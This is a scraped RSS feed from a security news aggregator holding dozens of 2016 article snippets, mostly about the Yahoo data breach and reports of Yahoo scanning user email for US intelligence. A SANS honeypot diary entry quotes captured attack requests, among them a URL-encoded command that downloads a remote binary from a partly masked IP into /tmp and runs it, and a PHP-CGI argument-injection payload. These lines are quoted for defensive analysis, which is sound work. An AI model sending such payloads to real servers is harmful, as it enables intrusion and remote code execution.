This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-20T20:33:27+00:00 www.secnews.physaphae.fr Network World - Magazine Info Yahoo breach, for example, which could lead to a $1 billion drop in the company's value.To read this article in full or to leave a comment, please click here]]> 2016-10-13T05:42:00+00:00 http://www.networkworld.com/article/3130611/security/yahoo-shows-that-breach-impacts-can-go-far-beyond-remediation-expenses.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=195442 False Guideline Yahoo None The State of Security - Magazine Américain Read More ]]> 2016-10-13T03:00:22+00:00 http://www.tripwire.com/state-of-security/risk-based-security-for-executives/risk-management/the-unforeseen-impact-of-unforeseen-risk/ www.secnews.physaphae.fr/article.php?IdArticle=194788 False None Yahoo None Errata Security - Errata Security 2016-10-12T15:21:46+00:00 http://blog.erratasec.com/2016/10/wtf-yahoofisa-search-in-kernel.html www.secnews.physaphae.fr/article.php?IdArticle=194300 False None Yahoo None Graham Cluley - Blog Security It's not as easy to up sticks and leave your Yahoo account for dead as it used to be... ]]> 2016-10-12T12:42:15+00:00 https://www.grahamcluley.com/yahoo-accused-deliberately-making-hard-close-account/ www.secnews.physaphae.fr/article.php?IdArticle=193386 False None Yahoo None Naked Security - Blog sophos ]]> 2016-10-11T12:55:57+00:00 https://nakedsecurity.sophos.com/2016/10/11/yahoo-wont-let-you-forward-your-emails-to-another-service-but-why/ www.secnews.physaphae.fr/article.php?IdArticle=190317 False None Yahoo None Naked Security - Blog sophos ]]> 2016-10-11T11:05:27+00:00 https://nakedsecurity.sophos.com/2016/10/11/yahoo-wants-to-spy-on-you-through-advertising-billboards/ www.secnews.physaphae.fr/article.php?IdArticle=190237 False None Yahoo None Network World - Magazine Info changing email accounts-for Yahoo Mail users. Anyone who has already enabled the feature is not affected, but others cannot activate it.On its help pages, Yahoo says mail forwarding is currently under development. “While we work to improve it, we've temporarily disabled the ability to turn on Mail Forwarding for new forwarding addresses,” the help page says.To read this article in full or to leave a comment, please click here]]> 2016-10-11T06:55:00+00:00 http://www.networkworld.com/article/3130205/cloud-computing/yahoo-mail-suspends-automatic-mail-forwarding-as-privacy-controversies-swirl.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=190437 False None Yahoo None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-10-11T00:51:07+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/VigOBVD1ukc/yahoo-email-auto-forwarding.html www.secnews.physaphae.fr/article.php?IdArticle=189822 False None Yahoo None Graham Cluley - Blog Security The billboards would use a variety of sensor systems, including cameras and proximity technology, to capture real-time audio, video and even biometric information about potential target audiences. David Bisson reports. ]]> 2016-10-10T20:43:37+00:00 https://www.grahamcluley.com/yahoo-creepy-plan-advertising-billboards-spy/ www.secnews.physaphae.fr/article.php?IdArticle=188582 False None Yahoo None ZD Net - Magazine Info 2016-10-10T14:58:42+00:00 http://www.zdnet.com/article/us-required-to-declassify-yahoo-spying-order-say-experts/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=187660 False None Yahoo None CSO - CSO Daily Dashboard massive data breach at Yahoo, which affected at least 500 million user records, making it the largest data breach on record, might finally be what it takes to get the average internet user to take online security into their own hands - if only they knew how.To read this article in full or to leave a comment, please click here]]> 2016-10-10T03:29:00+00:00 http://www.csoonline.com/article/3129302/security/17-tools-to-protect-your-online-security.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=186715 False None Yahoo None Graham Cluley - Blog Security According to a report in "The Intercept", the snooping code was implemented in such a way that it could have allowed a hacker to "basically read everyone's Yahoo mail." ]]> 2016-10-09T21:34:53+00:00 https://www.grahamcluley.com/spy-program-given-hacker-access-yahoo-email-claims-employee/ www.secnews.physaphae.fr/article.php?IdArticle=184784 False None Yahoo None Graham Cluley - Blog Security Privacy watchdogs based in the European Union are concerned Yahoo violated European users' privacy with its secret email-scanning program. David Bisson reports. ]]> 2016-10-09T19:38:21+00:00 https://www.grahamcluley.com/privacy-watchdog-yahoo-email-scanning/ www.secnews.physaphae.fr/article.php?IdArticle=184400 False None Yahoo None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-10-08T02:28:24+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/R7W04M1cCe0/yahoo-email-hacking.html www.secnews.physaphae.fr/article.php?IdArticle=179018 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-07T18:15:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/GWmeP-holbo/ www.secnews.physaphae.fr/article.php?IdArticle=176240 False None Yahoo None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Ransomware operator shut down Stealing an AI Nobody is bidding on shadowbrokers files US government IP address contract ends Don’t be Yahoo Verizon wants $1bn discount You don’t have to be stupid to work here Links to other interesting stories from the week MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled Hacker releases code that powered Botnet attack against Krebs Microsoft has announced it is to harden the edge browser for enterprise users A really sweet presentation format and great information for incident response and security operations teams by Frode Hommedal Thrillseekers stuck on rides at Universal Studios after massive power outage --- redundancy fail? Or all part of the show? Halvar flake was asked why he works in security – and gives a nice response. What he didn’t give was my 3 favourite answers. Good pay, Sponsorship money, and VC money What makes call-out culture so toxic? The three infrastructure mistakes your company must not make Hootsuite’s CEO on what he learned from getting hacked on social media AlienVault OTX Maltego Transforms In other news from the week: Singing for the Unsung Heroes of IT Security AlienVault was a proud sponsor of the 2016]]> 2016-10-07T13:11:00+00:00 http://feeds.feedblitz.com/~/208328478/0/alienvault-blogs~Alien-Eye-in-the-Sky-Friday-October www.secnews.physaphae.fr/article.php?IdArticle=175862 False Guideline Yahoo None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-10-07T00:22:44+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/CsRQiz2ib3M/verizon-yahoo-acquisition-deal.html www.secnews.physaphae.fr/article.php?IdArticle=174719 False None Yahoo None Network World - Magazine Info Thursday report by the New York Post.Tim Armstrong, the head of AOL, which Verizon acquired in 2015, reportedly has met with Yahoo executives about reducing the acquisition price.  "He's pretty upset about the lack of disclosure and he's saying can we get out of this or can we reduce the price?" the report said, quoting what it called a source familiar with Verizon's thinking.To read this article in full or to leave a comment, please click here]]> 2016-10-06T17:40:02+00:00 http://www.networkworld.com/article/3128976/verizon-may-want-a-1-billion-discount-on-yahoo.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=173258 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-06T17:00:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/1ORCJgY6zus/ www.secnews.physaphae.fr/article.php?IdArticle=172189 False None Yahoo None CSO - CSO Daily Dashboard To read this article in full or to leave a comment, please click here]]> 2016-10-06T12:33:00+00:00 http://www.csoonline.com/article/3128851/security/what-csos-can-learn-from-the-yahoo-data-breach.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=173120 False None Yahoo None Network World - Magazine Info 2016-10-06T10:51:00+00:00 http://www.networkworld.com/video/70396/what-csos-can-learn-from-the-yahoo-breach#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=172155 False Guideline Yahoo None SANS Institute - SANS est un acteur de defense et formation A fairly mixed bunch. The attacks are mostly the general stuff, fairly typical for most organisations that have some sort of web presence. The site is empty so the only things we see are fully automated checks. These are requests like: (checking for file access)PROPFIND /webdav/ HTTP/1.1 (exploitation) GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20%68%74%74%70%3A%2F%2F%32%32%32%2E%31%38%36%2E%32%31%2E%34%32%3A%33%33%38%39%30%2F%63%62%71%26%26%20%63%68%6D%6F%64%20%2B%78%20%63%62%71%26%26%20%2E%2F%63%62%71 which is --cd /tmp wget hxxp://222.186.xx.xx:33890/cbq chmod +x cbq ./cbq (the xx are mine) (admin tool access)GET //phpMyAdmin ..... Various types of requests (scanner)GET /muieblackcat HTTP/1.1 (scanning) GET /w00tw00t.at.ISC.SANS.DFind: (no that is not us) (file inclusion)POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E which is -- phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n (openProxy Check)CONNECT mx-tw.mail.gm0.yahoodns.net:25 The locations containthe usual suspects (NL, PL CN). SG was a little bit of a surprise, likewise CA, I dont usually get traffic from those spots. The SSH logs were interesting although I had to make it the top 30. I suspect the pattern is relatively clear. Seems likeNanjingis a busy spot. Ive mentioned in a previous post (about a year ago) that the whole 222.186.0.0/16 subnet can easily be blocked and your SSH brute forcing attempts will go down significantly. Looks like the subnet is still heavily at it. This pattern is repeated on other honeypots in different regions. " /> On this particular honeypot I allow access when the correct password is provided. the top 10 in this case are as follows:" /> In this case a Russian IP address was the most active, although the actual location for the IP is in Prague (RU provider). They upload one stage which then fetches more nastiness. However, my honeypot doesnt take it that far. The CN locations seem more interested in just guessing passwords and not actually doing much more than that. Most of the actual conenctions are usually from the US, NL and DE (although NL must have been having a few bad months). On the password and userid front the main user accounts and passwords used were:"> Common users used Common passwords used ]]> 2016-10-06T09:37:20+00:00 https://isc.sans.edu/diary.html?storyid=21561&rss www.secnews.physaphae.fr/article.php?IdArticle=170965 False None Yahoo None Network World - Magazine Info Yahoo had built a system for U.S. government agencies to search all of its users' incoming emails. Other tech companies were quick to distance themselves, saying they would have challenged any such request in court.To read this article in full or to leave a comment, please click here]]> 2016-10-06T06:44:03+00:00 http://www.networkworld.com/article/3128377/eu-privacy-watchdogs-have-questions-about-yahoos-secret-email-scanning.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=171674 False None Yahoo None Errata Security - Errata Security vague story about Yahoo searching emails for the NSA was cleared up today with various stories from other outlets [1]. It seems clear a FISA court order was used to compel Yahoo to search all their customer's email for a pattern (or patterns). But there's an important detail still missing: what specifically were they searching for? In this post, I give an example.The NYTimes article explains the search thusly:Investigators had learned that agents of the foreign terrorist organization were communicating using Yahoo's email service and with a method that involved a “highly unique” identifier or signature, but the investigators did not know which specific email accounts those agents were using, the officials said.What they are likely referring it is software like "Mujahideen Secrets", which terrorists have been using for about a decade to encrypt messages. It includes a unique fingerprint/signature that can easily be searched for, as shown below.In the screenshot below, I use this software to type in a secret message:I then hit the "encrypt" button, and get the following, a chunk of random looking text:This software encrypts, but does not send/receive messages. You have to do that manually yourself. It's intended that terrorists will copy/paste this text into emails. They may also paste the messages into forum posts. Encryption is so good that nobody, not even the NSA, can crack properly encrypted messages, so it's okay to post them to public forums, and still maintain secrecy.In my case, I copy/pasted this encrypted message into an email message from one of my accounts and sent to to one of my Yahoo! email accounts. I received the message shown below:The obvious "highly unique signature" the FBI should be looking for, to catch this software, is the string:### Begin ASRAR El Mojahedeen v2.0 Encrypted Message ###Indeed, if this is the program the NSA/FBI was looking for, they've now caught this message in their dragnet of incoming Yahoo! mail. This is a bit creepy, which is why I added a plea to the message, in unencrypted form, asking them not to rendition or drone strike me. Since the NSA can use such signatures to search traffic from websites, as well as email traffic, there's a good change you've been added to their "list" simply for reading this blog post. For fun, send this blogpost to family or friends you don't particularly like, in order to get them on the watch list as well.]]> 2016-10-06T02:47:52+00:00 http://blog.erratasec.com/2016/10/what-yahoo-nsa-mightve-looked-for.html www.secnews.physaphae.fr/article.php?IdArticle=170396 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-05T19:30:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/XC3a4ldS8Kg/ www.secnews.physaphae.fr/article.php?IdArticle=168284 False Guideline Yahoo None @DarkReading - Flux twitter 2016-10-05T17:16:07+00:00 https://twitter.com/DarkReading/status/783687217164222464 www.secnews.physaphae.fr/article.php?IdArticle=167494 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-10-05T16:30:51+00:00 https://threatpost.com/yahoo-slams-email-surveillance-story-experts-demand-details/121100/ www.secnews.physaphae.fr/article.php?IdArticle=167924 False Guideline Yahoo None SecurityWeek - Security News 2016-10-05T16:10:02+00:00 http://feedproxy.google.com/~r/Securityweek/~3/Gm2HHyN0vxk/amid-privacy-outcry-yahoo-denies-surveillance-allegations www.secnews.physaphae.fr/article.php?IdArticle=167823 False Guideline Yahoo None Network World - Magazine Info new report from The New York Times that provided more details on Yahoo's email scanning.  The report on Wednesday report didn't identify the signature or say if it involved any cryptographic computer code. But the article said it was the U.S. Department of Justice, and not the National Security Agency, that had obtained a court order forcing Yahoo to comply. A Reuters report on Tuesday wasn't clear about what agencies were involved in the probe.To read this article in full or to leave a comment, please click here]]> 2016-10-05T16:06:20+00:00 http://www.networkworld.com/article/3128308/yahoos-secret-email-scans-helped-the-fbi-probe-terrorists.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=168746 False None Yahoo None Naked Security - Blog sophos ]]> 2016-10-05T13:55:15+00:00 https://nakedsecurity.sophos.com/2016/10/05/yahoo-allegedly-scanned-incoming-emails-for-us-intelligence/ www.secnews.physaphae.fr/article.php?IdArticle=166898 False None Yahoo None @AnonyOps - Flux twitter 2016-10-05T13:39:26+00:00 https://twitter.com/csoghoian/status/783632685734498308 www.secnews.physaphae.fr/article.php?IdArticle=167736 False None Yahoo None Dark Reading - Informationweek Branch 2016-10-05T10:30:00+00:00 http://www.darkreading.com/attacks-breaches/yahoo-reportedly-complied-with-us-intel-request-to-search-all-customer-emails/d/d-id/1327098?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=167463 False None Yahoo None UnderNews - Site de news "pirate" francais L'affaire de piratage massif ayant touché Yahoo en 2012 n'est visiblement pas terminée. En effet, selon un ancien dirigeant de Yahoo! au fait de la politique de sécurité de la firme, le piratage informatique pourrait avoir permis de dérober six fois plus de comptes utilisateurs qu'annoncé...]]> 2016-10-05T08:53:38+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/iEc_y0LlPaA/yahoo-jusqua-3-milliards-de-comptes-pirates.html www.secnews.physaphae.fr/article.php?IdArticle=166053 False None Yahoo None UnderNews - Site de news "pirate" francais Décidément, il s'agit d'une période hautement critique pour Yahoo! Après la révélation d'une immense fuite de données des utilisateurs, voila qu'une affaire d'espionnage des courriels pour le compte de la NSA et du FBI fait surface.]]> 2016-10-05T07:39:16+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/GdAuyFWE5EU/yahoo-un-espionnage-de-masse-des-courriels-de-ses-utilisateurs-pour-les-autorites.html www.secnews.physaphae.fr/article.php?IdArticle=165881 False None Yahoo None Network World - Magazine Info Reuters article claimed that Yahoo had created the custom software program after receiving a classified U.S. government order.  That software program is reportedly capable of scanning all incoming emails from Yahoo customers for information provided by U.S. intelligence officials.However, on Wednesday Yahoo disputed the report.“We narrowly interpret every government request for user data to minimize disclosure. The mail scanning described in the article does not exist on our systems," the company said in an email. To read this article in full or to leave a comment, please click here]]> 2016-10-05T07:30:06+00:00 http://www.networkworld.com/article/3128124/yahoo-calls-report-of-secret-email-scanning-misleading.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=167099 False Guideline Yahoo None CSO - CSO Daily Dashboard a rise in global cybercrime damages are seemingly responsible for a surge in the share prices of some publicly-traded cybersecurity companies.The Cybersecurity Stock Report, published quarterly by Cybersecurity Ventures, notes the PureFunds HACK ETF -- which covers 35 cyber firms -- is up 35 percent since February 2016, when it hit a low for the year.To read this article in full or to leave a comment, please click here]]> 2016-10-05T07:13:00+00:00 http://www.csoonline.com/article/3128037/security/cybersecurity-companies-stock-rises-in-face-of-post-yahoo-hack.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=167408 False None Yahoo None Wired Threat Level - Security News For Apple and now for Yahoo, stronger encryption only made government spying demands more aggressive. The post How Did the Feds Get Past Yahoo's Encryption? Yahoo!]]> 2016-10-04T22:56:14+00:00 https://www.wired.com/2016/10/yahoo-spy-scandal-shows-encryption-fails-without-backbone/ www.secnews.physaphae.fr/article.php?IdArticle=164090 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-04T20:30:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/ZPUl7cDhuKk/ www.secnews.physaphae.fr/article.php?IdArticle=163708 False None Yahoo None Graham Cluley - Blog Security Hundreds of millions of Yahoo Mail accounts had their emails scanned on behalf of US intelligence, reports Reuters. ]]> 2016-10-04T20:05:08+00:00 https://www.grahamcluley.com/time-close-yahoo-account/ www.secnews.physaphae.fr/article.php?IdArticle=163582 False None Yahoo None Errata Security - Errata Security 2016-10-04T19:58:59+00:00 http://blog.erratasec.com/2016/10/the-yahoo-email-search-story-is-garbage.html www.secnews.physaphae.fr/article.php?IdArticle=164136 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-04T19:15:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/DkZYUchy1YU/ www.secnews.physaphae.fr/article.php?IdArticle=163284 False None Yahoo None Ars Technica - Risk Assessment Security Hacktivism 2016-10-04T17:59:23+00:00 http://arstechnica.com/tech-policy/2016/10/report-fbi-andor-nsa-ordered-yahoo-to-build-secret-e-mail-search-tool/ www.secnews.physaphae.fr/article.php?IdArticle=162863 False None Yahoo None Network World - Magazine Info reportedly created last year through a classified U.S. order, involves Yahoo searching through hundreds of millions of user accounts at the behest of the National Security Agency or FBI.Other U.S. tech companies, including Google, Microsoft, Twitter and Facebook, denied doing anything like it. Most also said they would challenge such a request in court.Privacy advocates said the government enlisting Yahoo to assist in email monitoring would be wrong.To read this article in full or to leave a comment, please click here]]> 2016-10-04T17:37:53+00:00 http://www.networkworld.com/article/3127153/us-tech-giants-say-they-didnt-do-yahoo-style-email-spying.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=164312 False None Yahoo None ZD Net - Magazine Info 2016-10-04T17:31:00+00:00 http://www.zdnet.com/article/yahoo-secretly-scanned-customer-emails-for-us-intelligence/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=162883 False None Yahoo None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-10-04T12:02:06+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/3bRnuQn5x7Q/yahoo-email-spying.html www.secnews.physaphae.fr/article.php?IdArticle=163259 False None Yahoo None Network World - Magazine Info Tuesday report from Reuters.Yahoo reportedly created the program to comply with a U.S. classified government directive. It's unclear if the mass email searching program is still in use."Yahoo is a law-abiding company and complies with the laws of the United States," the company said in a statement.To read this article in full or to leave a comment, please click here]]> 2016-10-04T11:47:19+00:00 http://www.networkworld.com/article/3127612/yahoo-may-have-allowed-us-government-to-search-user-emails.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=163129 False None Yahoo None SC Magazine - Magazine ]]> 2016-10-03T15:00:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/BpnFFFzpoKU/ www.secnews.physaphae.fr/article.php?IdArticle=157998 False None Yahoo None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-10-01T02:38:21+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/NZRul8Wnd0U/yahoo-data-breach-billion.html www.secnews.physaphae.fr/article.php?IdArticle=150971 False None Yahoo None SC Magazine - Magazine ]]> 2016-09-30T18:30:33+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/LPLNjV1RrvU/ www.secnews.physaphae.fr/article.php?IdArticle=149362 False None Yahoo None Graham Cluley - Blog Security A security company has found evidence that suggests state-sponsored attackers may not have been responsible for the hack that saw 500 million Yahoo users' account details stolen. David Bisson reports. ]]> 2016-09-30T17:26:23+00:00 https://www.grahamcluley.com/security-firm-pours-cold-water-yahoos-claim-suffered-state-sponsored-hack/ www.secnews.physaphae.fr/article.php?IdArticle=148844 False None Yahoo None SecurityWeek - Security News 2016-09-30T14:50:37+00:00 http://feedproxy.google.com/~r/Securityweek/~3/HEUJUNo8I5w/yahoo-doesnt-revoke-ios-mail-access-after-password-change www.secnews.physaphae.fr/article.php?IdArticle=148262 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-09-30T14:37:58+00:00 https://threatpost.com/threatpost-news-wrap-september-30-2016/120995/ www.secnews.physaphae.fr/article.php?IdArticle=148093 False None Yahoo None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC A five person gang potentially behind the Yahoo breach. A list of wifi hacking apps for your android An investment bank held to ransom. Docker and Microsoft announce a partnership. Challenges to mobile application security And Brian Kreb’s being DDoS’d by an IoT powered botnet.       ]]> 2016-09-30T13:50:00+00:00 http://feeds.feedblitz.com/~/205218694/0/alienvault-blogs~Alien-Eye-in-the-Sky-Friday-th-September-Video-Blog www.secnews.physaphae.fr/article.php?IdArticle=148034 False None Yahoo None @DarkReading - Flux twitter 2016-09-29T23:16:34+00:00 https://twitter.com/DarkReading/status/781603602007744512 www.secnews.physaphae.fr/article.php?IdArticle=145414 False None Yahoo None SC Magazine - Magazine ]]> 2016-09-29T19:29:00+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/D37yT9oUKUM/ www.secnews.physaphae.fr/article.php?IdArticle=145242 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-09-29T18:15:18+00:00 https://threatpost.com/yahoo-challenged-on-claims-breach-was-state-sponsored-attack/120975/ www.secnews.physaphae.fr/article.php?IdArticle=144935 False None Yahoo None Dark Reading - Informationweek Branch 2016-09-29T16:30:00+00:00 http://www.darkreading.com/attacks-breaches/researchers-shoot-down-yahoo-claim-of-nation-state-hack/d/d-id/1327065?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=145522 False None Yahoo None ZD Net - Magazine Info 2016-09-29T09:26:48+00:00 http://www.zdnet.com/article/yahoo-attack-not-state-sponsored-researchers-claim/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=142988 False None Yahoo None SecurityWeek - Security News 2016-09-29T09:21:26+00:00 http://feedproxy.google.com/~r/Securityweek/~3/VaEpSz2vcnc/leak-200-million-yahoo-accounts-linked-2014-hack www.secnews.physaphae.fr/article.php?IdArticle=143038 False None Yahoo None Graham Cluley - Blog Security Yahoo insiders say that protecting against hackers took a back seat. ]]> 2016-09-29T00:24:27+00:00 https://www.grahamcluley.com/yahoo-reset-user-passwords-years-ago-chose/ www.secnews.physaphae.fr/article.php?IdArticle=141257 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-09-28T17:18:40+00:00 https://threatpost.com/congressional-leaders-demand-answers-on-yahoo-breach/120931/ www.secnews.physaphae.fr/article.php?IdArticle=139868 False Guideline Yahoo None Network World - Magazine Info data breach that exposed information about millions of Yahoo user accounts, a security firm said Wednesday. Yahoo has blamed state actors for the attack, but it was actually elite hackers-for-hire who did it, according to InfoArmor, which claims to have some of the stolen information.    The independent security firm found the alleged data as part of its investigation into "Group E," a team of five professional hackers believed to be from Eastern Europe.To read this article in full or to leave a comment, please click here]]> 2016-09-28T16:32:33+00:00 http://www.networkworld.com/article/3125594/the-yahoo-hackers-werent-state-sponsored-a-security-firm-says.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=141096 False None Yahoo None Naked Security - Blog sophos ]]> 2016-09-28T15:56:24+00:00 https://nakedsecurity.sophos.com/2016/09/28/marissa-mayer-declined-to-reset-yahoo-users-passwords-2-years-ago/ www.secnews.physaphae.fr/article.php?IdArticle=139217 False None Yahoo None @AnonyOps - Flux twitter 2016-09-28T10:55:43+00:00 https://twitter.com/csoghoian/status/781054771335729152 www.secnews.physaphae.fr/article.php?IdArticle=139940 False None Yahoo None Network World - Magazine Info largest known data breach in history, Cloudera and Intel on Wednesday announced that they've donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator."The idea is, let's create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems," Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. "This is a big deal, and could have a huge impact around the world."To read this article in full or to leave a comment, please click here]]> 2016-09-28T09:41:12+00:00 http://www.networkworld.com/article/3125017/meet-apache-spot-a-new-open-source-project-for-cybersecurity.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=139455 False None Yahoo None @DarkReading - Flux twitter 2016-09-27T18:16:48+00:00 https://twitter.com/DarkReading/status/780803385721286656 www.secnews.physaphae.fr/article.php?IdArticle=134655 True None Yahoo None @DarkReading - Flux twitter 2016-09-27T17:16:00+00:00 https://twitter.com/DarkReading/status/780788086708006913 www.secnews.physaphae.fr/article.php?IdArticle=134364 False None Yahoo None @DarkReading - Flux twitter 2016-09-27T17:16:00+00:00 https://twitter.com/DarkReading/status/780788086699593728 www.secnews.physaphae.fr/article.php?IdArticle=134365 False None Yahoo None ZD Net - Magazine Info 2016-09-27T15:13:00+00:00 http://www.zdnet.com/article/yahoo-hack-delay-is-unacceptable-say-senators/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=134462 False None Yahoo None Dark Reading - Informationweek Branch 2016-09-27T11:27:00+00:00 http://www.darkreading.com/cloud/yahoo-confirms-august-data-dump-issue-unrelated-to-breach-of-500-million-users/d/d-id/1327024?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=134306 False None Yahoo None Network World - Magazine Info letter addressed to Yahoo's CEO, the lawmakers said they were particularly "disturbed" that the breach occurred in 2014, but that Yahoo only publicized it last week."That means millions of Americans' data may have been compromised for two years," the letter said. "This is unacceptable."The hacking incident, which Yahoo said it only learned recently, affects at least 500 million users, making it perhaps the largest known data breach in history. Account information, including email addresses, telephone numbers, and hashed passwords, may have been stolen.To read this article in full or to leave a comment, please click here]]> 2016-09-27T10:38:08+00:00 http://www.networkworld.com/article/3124420/six-senators-demand-more-details-about-the-yahoo-data-breach.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=134693 False Guideline Yahoo None Dark Reading - Informationweek Branch 2016-09-27T10:35:00+00:00 http://www.darkreading.com/attacks-breaches/yahoo-sued-by-user-over-2014-hacking-/d/d-id/1327018?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=133956 False None Yahoo None Dark Reading - Informationweek Branch 2016-09-27T10:30:00+00:00 http://www.darkreading.com/attacks-breaches/yahoo-breach-us-senator-seeks-sec-role-in-probe/d/d-id/1327017?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=133957 False None Yahoo None ComputerWeekly - Computer Magazine 2016-09-27T08:45:19+00:00 http://www.computerweekly.com/news/450305046/Yahoo-breach-underlines-need-for-Security-Serious-Week www.secnews.physaphae.fr/article.php?IdArticle=134837 False None Yahoo None Data Security Breach - Site de news Francais Chiffrement : 27% des certificats sur Yahoo n’ont réédités est diffusé par Data Security Breach. ]]> 2016-09-27T08:26:48+00:00 http://www.datasecuritybreach.fr/certificats-yahoo-reedites/ www.secnews.physaphae.fr/article.php?IdArticle=132633 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-09-26T19:58:18+00:00 https://threatpost.com/questions-mount-around-yahoo-breach/120876/ www.secnews.physaphae.fr/article.php?IdArticle=129797 False None Yahoo None SC Magazine - Magazine ]]> 2016-09-26T19:30:39+00:00 http://feedproxy.google.com/~r/SCMagazineHome/~3/quPUSZsZmDs/ www.secnews.physaphae.fr/article.php?IdArticle=130019 False None Yahoo None Network World - Magazine Info hack that stole account information from 500 million users."I think there's a lot of fishiness going on here," said Michael Lipinski, the chief security strategist at Securonix.Yahoo didn't respond to a request for comment. The company has protocols in place that can detect state-sponsored hacking into user accounts. In a December 2015 blog post, the company outlined its policy, saying it will warn users when this is suspected. To read this article in full or to leave a comment, please click here]]> 2016-09-26T18:07:35+00:00 http://www.networkworld.com/article/3124785/yahoos-claim-of-state-sponsored-hackers-meets-with-skepticism.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=130816 False None Yahoo None @DarkReading - Flux twitter 2016-09-26T17:17:24+00:00 https://twitter.com/DarkReading/status/780426048873693184 www.secnews.physaphae.fr/article.php?IdArticle=128676 False None Yahoo None SecurityWeek - Security News 2016-09-26T16:34:09+00:00 http://feedproxy.google.com/~r/Securityweek/~3/B5_8QrXPlC0/users-file-lawsuit-against-yahoo-over-data-breach www.secnews.physaphae.fr/article.php?IdArticle=128819 False None Yahoo None Graham Cluley - Blog Security Could Yahoo could have done more to protect itself, and why didn't it notice it had suffered a data breach sooner? While those questions are being pondered, legal eagles will be earning a pretty penny working on this lawsuit... ]]> 2016-09-26T14:27:10+00:00 https://www.grahamcluley.com/yahoo-sued-massive-hack/ www.secnews.physaphae.fr/article.php?IdArticle=128304 False None Yahoo None Graham Cluley - Blog Security It turns out it's not as simple as just checking whether you have a Yahoo, BT Yahoo Mail or Sky email address... You could have a Yahoo account without even knowing it. ]]> 2016-09-26T13:53:43+00:00 